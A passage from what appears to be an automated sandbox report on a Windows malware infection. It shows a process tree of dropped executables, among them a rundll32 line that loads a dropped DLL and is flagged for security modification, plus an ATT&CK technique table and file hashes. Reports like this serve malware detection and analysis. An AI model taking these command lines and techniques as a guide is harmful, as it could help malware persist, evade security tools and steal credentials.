                                                                        • Suspicious behavior: MapViewOfSection
                                                                        PID:5704
                                                                      • C:\Users\Admin\AppData\Local\Temp\E4FD.exe
                                                                        C:\Users\Admin\AppData\Local\Temp\E4FD.exe
                                                                        1⤵
                                                                        • Executes dropped EXE
                                                                        • Suspicious use of SetThreadContext
                                                                        PID:1776
                                                                        • C:\Users\Admin\AppData\Local\Temp\E4FD.exe
                                                                          "C:\Users\Admin\AppData\Local\Temp\E4FD.exe"
                                                                          2⤵
                                                                          • Executes dropped EXE
                                                                          PID:5356
                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                        1⤵
                                                                        • Drops file in Windows directory
                                                                        • Modifies registry class
                                                                        • Suspicious use of SetWindowsHookEx
                                                                        PID:776
                                                                      • C:\Windows\system32\browser_broker.exe
                                                                        C:\Windows\system32\browser_broker.exe -Embedding
                                                                        1⤵
                                                                        • Modifies Internet Explorer settings
                                                                        PID:4216
                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                        1⤵
                                                                        • Suspicious behavior: MapViewOfSection
                                                                        • Suspicious use of SetWindowsHookEx
                                                                        PID:4644
                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                        1⤵
                                                                        • Modifies registry class
                                                                        PID:5884
                                                                        • C:\Windows\system32\WerFault.exe
                                                                          C:\Windows\system32\WerFault.exe -u -p 5884 -s 3048
                                                                          2⤵
                                                                          • Program crash
                                                                          PID:5564
                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                        1⤵
                                                                        • Modifies registry class
                                                                        PID:5032
                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                        1⤵
                                                                        • Modifies registry class
                                                                        PID:4964
                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                        1⤵
                                                                        • Modifies registry class
                                                                        PID:3064
                                                                      • C:\Users\Admin\AppData\Roaming\vuuadgh
                                                                        C:\Users\Admin\AppData\Roaming\vuuadgh
                                                                        1⤵
                                                                        • Executes dropped EXE
                                                                        • Suspicious use of SetThreadContext
                                                                        PID:5476
                                                                        • C:\Users\Admin\AppData\Roaming\vuuadgh
                                                                          C:\Users\Admin\AppData\Roaming\vuuadgh
                                                                          2⤵
                                                                          • Executes dropped EXE
                                                                          • Checks SCSI registry key(s)
                                                                          • Suspicious behavior: MapViewOfSection
                                                                          PID:5288
                                                                      • C:\Users\Admin\AppData\Roaming\bhuadgh
                                                                        C:\Users\Admin\AppData\Roaming\bhuadgh
                                                                        1⤵
                                                                        • Executes dropped EXE
                                                                        • Checks SCSI registry key(s)
                                                                        • Suspicious behavior: MapViewOfSection
                                                                        PID:2584
                                                                      • C:\Windows\system32\rundll32.exe
                                                                        C:\Windows\system32\rundll32.exe "C:\Program Files (x86)\AotYqZ\AotYqZ.dll",AotYqZ
                                                                        1⤵
                                                                        • Windows security modification
                                                                        • Drops file in System32 directory
                                                                        • Modifies data under HKEY_USERS
                                                                        PID:5096
                                                                      • C:\Windows\system32\svchost.exe
                                                                        C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                        1⤵
                                                                          PID:364
                                                                        • \??\c:\windows\system32\svchost.exe
                                                                          c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
                                                                          1⤵
                                                                            PID:1152
                                                                          • C:\Users\Admin\AppData\Roaming\vuuadgh
                                                                            C:\Users\Admin\AppData\Roaming\vuuadgh
                                                                            1⤵
                                                                            • Executes dropped EXE
                                                                            • Suspicious use of SetThreadContext
                                                                            PID:4272
                                                                            • C:\Users\Admin\AppData\Roaming\vuuadgh
                                                                              C:\Users\Admin\AppData\Roaming\vuuadgh
                                                                              2⤵
                                                                              • Executes dropped EXE
                                                                              • Checks SCSI registry key(s)
                                                                              • Suspicious behavior: MapViewOfSection
                                                                              PID:3968
                                                                          • C:\Users\Admin\AppData\Roaming\bhuadgh
                                                                            C:\Users\Admin\AppData\Roaming\bhuadgh
                                                                            1⤵
                                                                            • Executes dropped EXE
                                                                            • Checks SCSI registry key(s)
                                                                            • Suspicious behavior: MapViewOfSection
                                                                            PID:3856

                                                                          Network

                                                                          MITRE ATT&CK Matrix ATT&CK v6

                                                                          Execution

                                                                          Scheduled Task

                                                                          1
                                                                          T1053

                                                                          Persistence

                                                                          Registry Run Keys / Startup Folder

                                                                          1
                                                                          T1060

                                                                          Scheduled Task

                                                                          1
                                                                          T1053

                                                                          BITS Jobs

                                                                          1
                                                                          T1197

                                                                          Privilege Escalation

                                                                          Scheduled Task

                                                                          1
                                                                          T1053

                                                                          Defense Evasion

                                                                          Disabling Security Tools

                                                                          2
                                                                          T1089

                                                                          Modify Registry

                                                                          5
                                                                          T1112

                                                                          BITS Jobs

                                                                          1
                                                                          T1197

                                                                          Install Root Certificate

                                                                          1
                                                                          T1130

                                                                          Credential Access

                                                                          Credentials in Files

                                                                          3
                                                                          T1081

                                                                          Discovery

                                                                          Software Discovery

                                                                          1
                                                                          T1518

                                                                          Query Registry

                                                                          3
                                                                          T1012

                                                                          System Information Discovery

                                                                          4
                                                                          T1082

                                                                          Security Software Discovery

                                                                          1
                                                                          T1063

                                                                          Peripheral Device Discovery

                                                                          1
                                                                          T1120

                                                                          Remote System Discovery

                                                                          1
                                                                          T1018

                                                                          Collection

                                                                          Data from Local System

                                                                          3
                                                                          T1005

                                                                          Command and Control

                                                                          Web Service

                                                                          1
                                                                          T1102

                                                                          Replay Monitor

                                                                          Loading Replay Monitor...

                                                                          Downloads

                                                                          • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                            MD5

                                                                            7124be0b78b9f4976a9f78aaeaed893a

                                                                            SHA1

                                                                            804f3e4b3f9131be5337b706d5a9ea6fcfa53e25

                                                                            SHA256

                                                                            bb28d7beea6e3faa641f69b9b4866858d87ca63f9eef15dae350b2dc28b537c3

                                                                            SHA512

                                                                            49f6df2ee5af4032ca47b01beb08648c7235a2dea51546aab8fc14d5f0ae7baa53cc539f24ea21d6db67882b4e65c8d271630fb8e12144cf24f6e8a4e598dff3

                                                                          • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                            MD5

                                                                            7124be0b78b9f4976a9f78aaeaed893a

                                                                            SHA1

                                                                            804f3e4b3f9131be5337b706d5a9ea6fcfa53e25

                                                                            SHA256

                                                                            bb28d7beea6e3faa641f69b9b4866858d87ca63f9eef15dae350b2dc28b537c3

                                                                            SHA512

                                                                            49f6df2ee5af4032ca47b01beb08648c7235a2dea51546aab8fc14d5f0ae7baa53cc539f24ea21d6db67882b4e65c8d271630fb8e12144cf24f6e8a4e598dff3

                                                                          • C:\Program Files\Microsoft Office 15\IDCXXTLBWB\ultramediaburner.exe
                                                                            MD5

                                                                            6103ca066cd5345ec41feaf1a0fdadaf

                                                                            SHA1

                                                                            938acc555933ee4887629048be4b11df76bb8de8

                                                                            SHA256

                                                                            b8d950bf6fa228454571f15cc4b7b6fbaa539f1284e43946abd90934db925201

                                                                            SHA512

                                                                            a9062e1fac2f6073a134d9756c84f70999240e36a98cb39684018e7d5bd3772f2ca21ab35bd2c6bd60413eb7306376e7f530e78ce4ebcfe256f766e8c42d16b3

                                                                          • C:\Program Files\Microsoft Office 15\IDCXXTLBWB\ultramediaburner.exe
                                                                            MD5

                                                                            6103ca066cd5345ec41feaf1a0fdadaf

                                                                            SHA1

                                                                            938acc555933ee4887629048be4b11df76bb8de8

                                                                            SHA256

                                                                            b8d950bf6fa228454571f15cc4b7b6fbaa539f1284e43946abd90934db925201

                                                                            SHA512

                                                                            a9062e1fac2f6073a134d9756c84f70999240e36a98cb39684018e7d5bd3772f2ca21ab35bd2c6bd60413eb7306376e7f530e78ce4ebcfe256f766e8c42d16b3

                                                                          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
                                                                            MD5

                                                                            e71a0a7e48b10bde0a9c54387762f33e

                                                                            SHA1

                                                                            fed75947f1163b00096e24a46e67d9c21e7eeebd

                                                                            SHA256

                                                                            83d7be67d0eb544d655cc8e8eb687c26f772d6a40ebf8394e5c12b248976a2de

                                                                            SHA512

                                                                            394c25daef6143de894505189b1edcdffb82fd6ab9de1c9e43865fb790803ff5c384debfe16236d4a9d95a78d3eea548d3cef332ed5a6881ac9c50d252c3c34a

                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                            MD5

                                                                            36eae1f3665134de89f17a24b8cb61db

                                                                            SHA1

                                                                            44036ac326bdc50e2c941fee71ab63fb434d7f8d

                                                                            SHA256

                                                                            cbb6a3133d413c4226e32fec83cfc4798d275fcd3ba7795ee17e5dfac708c935

                                                                            SHA512

                                                                            eeb97e6f05bce609f7aa93a4a68f7dd147b5b20bb363c9493b56b7ff54e84d2abce384cea406970e064af14eecb03981489ae17c4379f9af6d78bb21471c7871

                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                            MD5

                                                                            2b722db3af777017c0cfb09224c7eb84

                                                                            SHA1

                                                                            eb6b437e088135d1382c56bbb6041c00e93a9006

                                                                            SHA256

                                                                            0fc692b226554926768e0bc3702912a7b2e345912cf3f8dd2cf52a78de9c667f

                                                                            SHA512

                                                                            c1805edae45f1bb0aa4f1a3ba41dfd308877ab09962f5c4e02e74d0ed26cca653ae70edc450dda665000233e0ffcf58c6bd0e799715e5adc4a492772639e7414

                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                            MD5

                                                                            2b722db3af777017c0cfb09224c7eb84

                                                                            SHA1

                                                                            eb6b437e088135d1382c56bbb6041c00e93a9006

                                                                            SHA256

                                                                            0fc692b226554926768e0bc3702912a7b2e345912cf3f8dd2cf52a78de9c667f

                                                                            SHA512

                                                                            c1805edae45f1bb0aa4f1a3ba41dfd308877ab09962f5c4e02e74d0ed26cca653ae70edc450dda665000233e0ffcf58c6bd0e799715e5adc4a492772639e7414

                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                            MD5

                                                                            66a2225f5b735d665bd4fecc487e1181

                                                                            SHA1

                                                                            441a467603c2c2632da4fe214b448ebb4c57fc64

                                                                            SHA256

                                                                            641c982fd2faac37e4aaabbbc3e7adf2e549f81e1c210fd4fedc53f2c2cee045

                                                                            SHA512

                                                                            a29554665dcf82a2a6fd7b3f07a66579e2f08c18e642952490c37b3766e07af60cc66b0537b1f87a501087bcbf49f880b3682a77fe08233fdd0a34695229cd1b

                                                                          • C:\Users\Admin\AppData\Local\Temp\0wceh1d0.ar0\google-game.exe
                                                                            MD5

                                                                            48a721df1726bb896ec7fa259f8f5307

                                                                            SHA1

                                                                            42aa339e08177f1a68c70aebe58a244f79a8fa7a

                                                                            SHA256

                                                                            54449e7a76e46e1c95e9672f45080a95c718d2bd5dce3202bf6fd6fb5885e49e

                                                                            SHA512

                                                                            ca28b9a1c41e0ab54ede10fe5717b9e5ed7a0ecb973985ab1b6f1fb1e427dd28c1d085ee9782fd936b7ed4430a97738c0a8c677f72182c8297d706dbe24267e3

                                                                          • C:\Users\Admin\AppData\Local\Temp\2ltmo54e.tyq\y1.exe
                                                                            MD5

                                                                            211704d0d7c978042c9fd858fd7a3256

                                                                            SHA1

                                                                            ed582bf85c777e03990562af0ca5d3503646e462

                                                                            SHA256

                                                                            98105987364d21e0167d6b6a90510a9beea0746eca7a3326c13c11806ffced79

                                                                            SHA512

                                                                            a25778cfe12b106e73b2a410276c0fe7b999501abfe2bb4c51d60992691f2d540797c05fcdcd653580f499e3042a32e73d4881a294ba599299b344f58e56ee11

                                                                          • C:\Users\Admin\AppData\Local\Temp\2ltmo54e.tyq\y1.exe
                                                                            MD5

                                                                            211704d0d7c978042c9fd858fd7a3256

                                                                            SHA1

                                                                            ed582bf85c777e03990562af0ca5d3503646e462

                                                                            SHA256

                                                                            98105987364d21e0167d6b6a90510a9beea0746eca7a3326c13c11806ffced79

                                                                            SHA512

                                                                            a25778cfe12b106e73b2a410276c0fe7b999501abfe2bb4c51d60992691f2d540797c05fcdcd653580f499e3042a32e73d4881a294ba599299b344f58e56ee11

                                                                          • C:\Users\Admin\AppData\Local\Temp\4w1wnaun.ihm\GcleanerWW.exe
                                                                            MD5

                                                                            4f4adcbf8c6f66dcfc8a3282ac2bf10a

                                                                            SHA1

                                                                            c35a9fc52bb556c79f8fa540df587a2bf465b940

                                                                            SHA256

                                                                            6b3c238ebcf1f3c07cf0e556faa82c6b8fe96840ff4b6b7e9962a2d855843a0b

                                                                            SHA512

                                                                            0d15d65c1a988dfc8cc58f515a9bb56cbaf1ff5cb0a5554700bc9af20a26c0470a83c8eb46e16175154a6bcaad7e280bbfd837a768f9f094da770b7bd3849f88

                                                                          • C:\Users\Admin\AppData\Local\Temp\70-9ecef-6b8-d5d92-2d9ec293a1244\Kisaekyvavi.exe
                                                                            MD5

                                                                            2304be32b9b1849493336fd90859ba95

                                                                            SHA1

                                                                            6f882e043e752e01d908bedd40ee86119829dab4

                                                                            SHA256

                                                                            75c16d010900e779b9ec46bcbe410d315c416f4ae9f1325180eaff82eb74be5e

                                                                            SHA512

                                                                            c76aef6da42442edb1984eda9a10ee7c377f5f5c9684cd02d903868642462165f8e58c1c24ad592f879679416f4335166d36fa3fe52903423bea9f124678ff70

                                                                          • C:\Users\Admin\AppData\Local\Temp\70-9ecef-6b8-d5d92-2d9ec293a1244\Kisaekyvavi.exe
                                                                            MD5

                                                                            2304be32b9b1849493336fd90859ba95

                                                                            SHA1

                                                                            6f882e043e752e01d908bedd40ee86119829dab4

                                                                            SHA256

                                                                            75c16d010900e779b9ec46bcbe410d315c416f4ae9f1325180eaff82eb74be5e

                                                                            SHA512

                                                                            c76aef6da42442edb1984eda9a10ee7c377f5f5c9684cd02d903868642462165f8e58c1c24ad592f879679416f4335166d36fa3fe52903423bea9f124678ff70

                                                                          • C:\Users\Admin\AppData\Local\Temp\70-9ecef-6b8-d5d92-2d9ec293a1244\Kisaekyvavi.exe.config
                                                                            MD5

                                                                            98d2687aec923f98c37f7cda8de0eb19

                                                                            SHA1

                                                                            f6dcfcdcfe570340ecdbbd9e2a61f3cb4f281ba7

                                                                            SHA256

                                                                            8a94163256a722ef8cc140bcd115a5b8f8725c04fe158b129d47be81cb693465

                                                                            SHA512

                                                                            95c7290d59749df8df495e04789c1793265e0f34e0d091df5c0d4aefe1af4c8ac1f5460f1f198fc28c4c8c900827b8f22e2851957bbaea5914ea962b3a1d0590

                                                                          • C:\Users\Admin\AppData\Local\Temp\99-a144a-40c-cbd95-4a9a536d4b86e\Kenessey.txt
                                                                            MD5

                                                                            97384261b8bbf966df16e5ad509922db

                                                                            SHA1

                                                                            2fc42d37fee2c81d767e09fb298b70c748940f86

                                                                            SHA256

                                                                            9c0d294c05fc1d88d698034609bb81c0c69196327594e4c69d2915c80fd9850c

                                                                            SHA512

                                                                            b77fe2d86fbc5bd116d6a073eb447e76a74add3fa0d0b801f97535963241be3cdce1dbcaed603b78f020d0845b2d4bfc892ceb2a7d1c8f1d98abc4812ef5af21

                                                                          • C:\Users\Admin\AppData\Local\Temp\99-a144a-40c-cbd95-4a9a536d4b86e\Qewalabavo.exe
                                                                            MD5

                                                                            2e916f9f7421b4a03ce59c093c0fe17c

                                                                            SHA1

                                                                            f894b4a08a536da16d43ab83f28de5b90767dba7

                                                                            SHA256

                                                                            31843ccaff2191dadac0b70b2ee4cf249bbe0926aeff0a140611878117f25ff6

                                                                            SHA512

                                                                            b9c810d79a57055cb55aacc1fdeaeeffb54dadeb4a2b72e2f852b70fac58b19f12d70cb1b208ab137790e9ac916caeda5a080f9ee1c47183446eea280525cdd9

                                                                          • C:\Users\Admin\AppData\Local\Temp\99-a144a-40c-cbd95-4a9a536d4b86e\Qewalabavo.exe
                                                                            MD5

                                                                            2e916f9f7421b4a03ce59c093c0fe17c

                                                                            SHA1

                                                                            f894b4a08a536da16d43ab83f28de5b90767dba7

                                                                            SHA256

                                                                            31843ccaff2191dadac0b70b2ee4cf249bbe0926aeff0a140611878117f25ff6

                                                                            SHA512

                                                                            b9c810d79a57055cb55aacc1fdeaeeffb54dadeb4a2b72e2f852b70fac58b19f12d70cb1b208ab137790e9ac916caeda5a080f9ee1c47183446eea280525cdd9

                                                                          • C:\Users\Admin\AppData\Local\Temp\99-a144a-40c-cbd95-4a9a536d4b86e\Qewalabavo.exe.config
                                                                            MD5

                                                                            98d2687aec923f98c37f7cda8de0eb19

                                                                            SHA1

                                                                            f6dcfcdcfe570340ecdbbd9e2a61f3cb4f281ba7

                                                                            SHA256

                                                                            8a94163256a722ef8cc140bcd115a5b8f8725c04fe158b129d47be81cb693465

                                                                            SHA512

                                                                            95c7290d59749df8df495e04789c1793265e0f34e0d091df5c0d4aefe1af4c8ac1f5460f1f198fc28c4c8c900827b8f22e2851957bbaea5914ea962b3a1d0590

                                                                          • C:\Users\Admin\AppData\Local\Temp\ck5qw2wh.hjn\c7ae36fa.exe
                                                                            MD5

                                                                            bdc3af7526fc621dfec201761352ad6a

                                                                            SHA1

                                                                            3cdbd4a7ee35541a65ace782970870dd710351d5

                                                                            SHA256

                                                                            9d3b59b3b337bbc0cb45cc3ed5090d5184b03910f42851969ad77f927d77199a

                                                                            SHA512

                                                                            a65d031885d6ddb342cf2cf7bdc07e9892c295bf7dd3651e258ec0d88bbbb47af72f9734c0bf6477b82a3f26a6565716f1811bb8f2f265d9b83734e8c064d4b0

                                                                          • C:\Users\Admin\AppData\Local\Temp\ck5qw2wh.hjn\c7ae36fa.exe
                                                                            MD5

                                                                            bdc3af7526fc621dfec201761352ad6a

                                                                            SHA1

                                                                            3cdbd4a7ee35541a65ace782970870dd710351d5

                                                                            SHA256

                                                                            9d3b59b3b337bbc0cb45cc3ed5090d5184b03910f42851969ad77f927d77199a

                                                                            SHA512

                                                                            a65d031885d6ddb342cf2cf7bdc07e9892c295bf7dd3651e258ec0d88bbbb47af72f9734c0bf6477b82a3f26a6565716f1811bb8f2f265d9b83734e8c064d4b0

                                                                          • C:\Users\Admin\AppData\Local\Temp\cy2b4rdq.sml\toolspab1.exe
                                                                            MD5

                                                                            06a08e813136e0821a988d8d98da796f

                                                                            SHA1

                                                                            b2ed88276ea47ff70cb22b94a62191fee175fddf

                                                                            SHA256

                                                                            a1c67d1bd5f6968a89d040044059e6a6209d89c428e30f533a1e6b99705a0c05

                                                                            SHA512

                                                                            beb13ff43331edc0fc17245099b012a203ab113bb91b5bd522813a2e965d6d4a532f9c3d8152d52faab34e1e8079f34142e2125b19d76fb5856a9d613c62a09a

                                                                          • C:\Users\Admin\AppData\Local\Temp\cy2b4rdq.sml\toolspab1.exe
                                                                            MD5

                                                                            06a08e813136e0821a988d8d98da796f

                                                                            SHA1

                                                                            b2ed88276ea47ff70cb22b94a62191fee175fddf

                                                                            SHA256

                                                                            a1c67d1bd5f6968a89d040044059e6a6209d89c428e30f533a1e6b99705a0c05

                                                                            SHA512

                                                                            beb13ff43331edc0fc17245099b012a203ab113bb91b5bd522813a2e965d6d4a532f9c3d8152d52faab34e1e8079f34142e2125b19d76fb5856a9d613c62a09a

                                                                          • C:\Users\Admin\AppData\Local\Temp\cy2b4rdq.sml\toolspab1.exe
                                                                            MD5

                                                                            06a08e813136e0821a988d8d98da796f

                                                                            SHA1

                                                                            b2ed88276ea47ff70cb22b94a62191fee175fddf

                                                                            SHA256

                                                                            a1c67d1bd5f6968a89d040044059e6a6209d89c428e30f533a1e6b99705a0c05

                                                                            SHA512

                                                                            beb13ff43331edc0fc17245099b012a203ab113bb91b5bd522813a2e965d6d4a532f9c3d8152d52faab34e1e8079f34142e2125b19d76fb5856a9d613c62a09a

                                                                          • C:\Users\Admin\AppData\Local\Temp\czn43gbn.cyu\SunLabsPlayer.exe
                                                                            MD5

                                                                            6eed4f285c033719f8c0ff2d3906d87a

                                                                            SHA1

                                                                            34050a77c5ad98580563f6b38481dc2ae63af6de

                                                                            SHA256

                                                                            3fa1eef0a71f3e8da97f09c0867efae890228571d2d976c31881e64ab33e8ea8

                                                                            SHA512

                                                                            0d66a730d12a6e52263deae3be5ae54b305aea99e9ee6350032be40dc6745dc8f3d49da4dc5eae0f0d32025ad0898c89fe02ecf87a5ad044c9e121dba1555dee

                                                                          • C:\Users\Admin\AppData\Local\Temp\czn43gbn.cyu\SunLabsPlayer.exe
                                                                            MD5

                                                                            6eed4f285c033719f8c0ff2d3906d87a

                                                                            SHA1

                                                                            34050a77c5ad98580563f6b38481dc2ae63af6de

                                                                            SHA256

                                                                            3fa1eef0a71f3e8da97f09c0867efae890228571d2d976c31881e64ab33e8ea8

                                                                            SHA512

                                                                            0d66a730d12a6e52263deae3be5ae54b305aea99e9ee6350032be40dc6745dc8f3d49da4dc5eae0f0d32025ad0898c89fe02ecf87a5ad044c9e121dba1555dee

                                                                          • C:\Users\Admin\AppData\Local\Temp\hh3tazxj.gum\instEU.exe
                                                                            MD5

                                                                            bdb62dc3502ea91f26181fa451bd0878

                                                                            SHA1

                                                                            bff5609cd44209ee1f07920b2103757792866d7a

                                                                            SHA256

                                                                            6b1dc06f68c7971c2dab6e0d01ed1691b3a400490cd2a1d6ce88c307d7566a3c

                                                                            SHA512

                                                                            12d94ef15f12268a2c849c18c06319b5796be4c11ffaa81c6a2e6356674842f075509acb08749219076a99e99179e2594541abe86e0c50e380b11fcc55375e5d

                                                                          • C:\Users\Admin\AppData\Local\Temp\hh3tazxj.gum\instEU.exe
                                                                            MD5

                                                                            bdb62dc3502ea91f26181fa451bd0878

                                                                            SHA1

                                                                            bff5609cd44209ee1f07920b2103757792866d7a

                                                                            SHA256

                                                                            6b1dc06f68c7971c2dab6e0d01ed1691b3a400490cd2a1d6ce88c307d7566a3c

                                                                            SHA512

                                                                            12d94ef15f12268a2c849c18c06319b5796be4c11ffaa81c6a2e6356674842f075509acb08749219076a99e99179e2594541abe86e0c50e380b11fcc55375e5d

                                                                          • C:\Users\Admin\AppData\Local\Temp\is-BFTBS.tmp\Ultra.exe
                                                                            MD5

                                                                            2321171d647af6aee7493ceaa711e6fb

                                                                            SHA1

                                                                            7a4e885025e1afe315e4dc8c74f9666243ac5c2a

                                                                            SHA256

                                                                            4ea355626a1c002680f773dc75af75ea0da8cf50226d0cee058b45385f438da9

                                                                            SHA512

                                                                            bacb1b360911cf798d92481e6bb26724bfb49cf70f199262639d376c39ca3e5d2d31ef1468884812d265f19b91a3e1c987756ab4616e870e5133998dfe2c818b

                                                                          • C:\Users\Admin\AppData\Local\Temp\is-BFTBS.tmp\Ultra.exe
                                                                            MD5

                                                                            2321171d647af6aee7493ceaa711e6fb

                                                                            SHA1

                                                                            7a4e885025e1afe315e4dc8c74f9666243ac5c2a

                                                                            SHA256

                                                                            4ea355626a1c002680f773dc75af75ea0da8cf50226d0cee058b45385f438da9

                                                                            SHA512

                                                                            bacb1b360911cf798d92481e6bb26724bfb49cf70f199262639d376c39ca3e5d2d31ef1468884812d265f19b91a3e1c987756ab4616e870e5133998dfe2c818b

                                                                          • C:\Users\Admin\AppData\Local\Temp\is-MQ9EL.tmp\Install.tmp
                                                                            MD5

                                                                            45ca138d0bb665df6e4bef2add68c7bf

                                                                            SHA1

                                                                            12c1a48e3a02f319a3d3ca647d04442d55e09265

                                                                            SHA256

                                                                            3960a0597104fc5bbf82bf6c03564a1eb6a829c560d1f50d0a63b4772fafbe37

                                                                            SHA512

                                                                            cd1a0493c26798eb70b3dabb8a439de7792c4676905cad21c6b3f372213ce9f6b65648245defcd36d4f19285160f41c62e1025e772e6b9f11aa126388ea8364f

                                                                          • C:\Users\Admin\AppData\Local\Temp\is-V7JHQ.tmp\ultramediaburner.tmp
                                                                            MD5

                                                                            4e8c7308803ce36c8c2c6759a504c908

                                                                            SHA1

                                                                            a3ec8c520620c0f9c8760f5c2c3ef6ab593240dc

                                                                            SHA256

                                                                            90fdd4ddf0f5700ed6e48ac33b5ede896a2d67e314fb48f6d948ab01b5c7ea4c

                                                                            SHA512

                                                                            780c1e8dce3e3f22dc820853bc18cadd969d7c1ce5a1bef52dbb09b3ae3c60b80116913c092760b9d50bda7857ff7de854e7b589106f3a2187697b76e3f1d7e7

                                                                          • C:\Users\Admin\AppData\Local\Temp\is-V7JHQ.tmp\ultramediaburner.tmp
                                                                            MD5

                                                                            4e8c7308803ce36c8c2c6759a504c908

                                                                            SHA1

                                                                            a3ec8c520620c0f9c8760f5c2c3ef6ab593240dc

                                                                            SHA256

                                                                            90fdd4ddf0f5700ed6e48ac33b5ede896a2d67e314fb48f6d948ab01b5c7ea4c

                                                                            SHA512

                                                                            780c1e8dce3e3f22dc820853bc18cadd969d7c1ce5a1bef52dbb09b3ae3c60b80116913c092760b9d50bda7857ff7de854e7b589106f3a2187697b76e3f1d7e7

                                                                          • C:\Users\Admin\AppData\Local\Temp\nst83DD.tmp\tempfile.ps1
                                                                            MD5

                                                                            71e5795ca945d491ca5980bbba31c277

                                                                            SHA1

                                                                            c33cd8b3854637bb602f54dfc0fca24d71ca2f82

                                                                            SHA256

                                                                            fd691567c181efe49969737247ae8052278b294d54f5905478f9477d4c76ab2f

                                                                            SHA512

                                                                            f8404c4c609f82f91ad144bc0dd0c7d66e70393f6eab3af55d88969adc141e054c6de117396067ae2bc058e494453d346cd8ed595d7646dfddbb54f8d24f415a

                                                                          • C:\Users\Admin\AppData\Local\Temp\nst83DD.tmp\tempfile.ps1
                                                                            MD5

                                                                            22d6ff2aa8423bbdccf162adcb9e6b2b

                                                                            SHA1

                                                                            528d8a516b181b03c425ab2a76ef3c3437885ae6

                                                                            SHA256

                                                                            f35aeb2952ffdef659754d039c46197a1a7515f4267148698cf10c8a577a8b2e

                                                                            SHA512

                                                                            1fe67ccb9bd3d488ec3a7a1ff676d29d904b5cd675f35c80f7a52b68f7d7f6e9ec20fcbbd04115a8ffa86c3121e10037126f0af28bdbf7b7f8fbcd972765e65b

                                                                          • C:\Users\Admin\AppData\Local\Temp\nst83DD.tmp\tempfile.ps1
                                                                            MD5

                                                                            8fdce8a3774e1f7ed61d8299adee3edd

                                                                            SHA1

                                                                            309d0f30bebac97e6fbc270f6186082f430d6231

                                                                            SHA256

                                                                            afdd9a253a5a96702951c7d00089ae04eb1eb9933699abf097a7d751e34fddee

                                                                            SHA512

                                                                            d66dcba0d16964abf7097b1ab25323025493f49b1da7031c359ab087ca9bca2a6b6f2901b9491c2d7a52f37958fc6f522e143ce950d024628156db002810af19

                                                                          • C:\Users\Admin\AppData\Local\Temp\nst83DD.tmp\tempfile.ps1
                                                                            MD5

                                                                            8fdce8a3774e1f7ed61d8299adee3edd

                                                                            SHA1

                                                                            309d0f30bebac97e6fbc270f6186082f430d6231

                                                                            SHA256

                                                                            afdd9a253a5a96702951c7d00089ae04eb1eb9933699abf097a7d751e34fddee

                                                                            SHA512

                                                                            d66dcba0d16964abf7097b1ab25323025493f49b1da7031c359ab087ca9bca2a6b6f2901b9491c2d7a52f37958fc6f522e143ce950d024628156db002810af19

                                                                          • C:\Users\Admin\AppData\Local\Temp\nst83DD.tmp\tempfile.ps1
                                                                            MD5

                                                                            86cf9e992d910813213ef33abd88dfab

                                                                            SHA1

                                                                            adfefcdd811ee62c7327519d024ed6f38bc42f08

                                                                            SHA256

                                                                            c7ffcca83f69ea19393694240650fe2e4041e681956bef2becf4aefda12b4a0d

                                                                            SHA512

                                                                            9ab188c4e944514c8589a557e477be285fb28d0351796805a131016f4448444fb8a55cbb61dea0c3b6526e7b8f957caee8d199eade9a2f221392b0775f6f66f9

                                                                          • C:\Users\Admin\AppData\Local\Temp\qxznayop.ihv\md1_1eaf.exe
                                                                            MD5

                                                                            25d9f83dc738b4894cf159c6a9754e40

                                                                            SHA1

                                                                            152a0e0a8319c8d6bfbe6ae71ae5dda5cba2caca

                                                                            SHA256

                                                                            8216cf00254d2febdfa67014d7265e008a6f485724c68579c5921f91a0069135

                                                                            SHA512

